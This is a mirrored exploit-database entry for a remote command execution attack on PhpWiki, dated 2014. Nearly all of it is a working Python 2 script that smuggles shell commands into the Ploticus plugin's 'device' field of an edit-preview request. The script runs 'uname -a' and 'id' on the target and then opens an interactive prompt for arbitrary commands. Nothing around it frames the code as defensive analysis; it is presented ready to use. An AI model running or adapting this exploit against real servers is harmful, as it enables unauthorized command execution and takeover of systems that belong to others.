PhpWiki – Remote Command Execution

• Exploit Database
• 39 阅读

• 作者： Benjamin Harris
  日期： 2014-08-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34451/

• ###############################################################
  #_______ __ _ 
  # / __/_______ _____/ /_____ ___(_) /__(_)
  #/ /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
  # / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
  #/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ 
  # /_/ /_/ /_/ 
  # Diskovered in Nov/Dec 2011
  ###############################################################
  
  import urllib
  import urllib2
  import sys
  def banner():
  	print "	_______ __ _ "
  	print "	 / __/_______ _____/ /_____ ___(_) /__(_)"
  	print "	/ /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
  	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /"
  	print "	/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
  	print "	 /_/ /_/ /_/ \n"
  
  
  def usage():
  	banner()
  	print "	[+] Usage example"
  	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
  
  if len(sys.argv)< 2:
  	usage()
  	quit()
  
  domain = sys.argv[1]
  def commandexec(cmd):
  	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
  	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
  	cmd2 = urllib2.urlopen(cmd1)
  	output = cmd2.read()
  	firstloc = output.find("123:::\n") + len("123:::\n")
  	secondloc = output.find("\n:::123")
  	return output[firstloc:secondloc]
  
  
  banner()
  print commandexec('uname -a')
  print commandexec('id')
  while(quit != 1):
  	cmd = raw_input('Run a command: ')
  	if cmd == 'quit':
  		print "[-] Hope you had fun :)"
  		quit = 1
  	if cmd != 'quit':
  		print commandexec(cmd)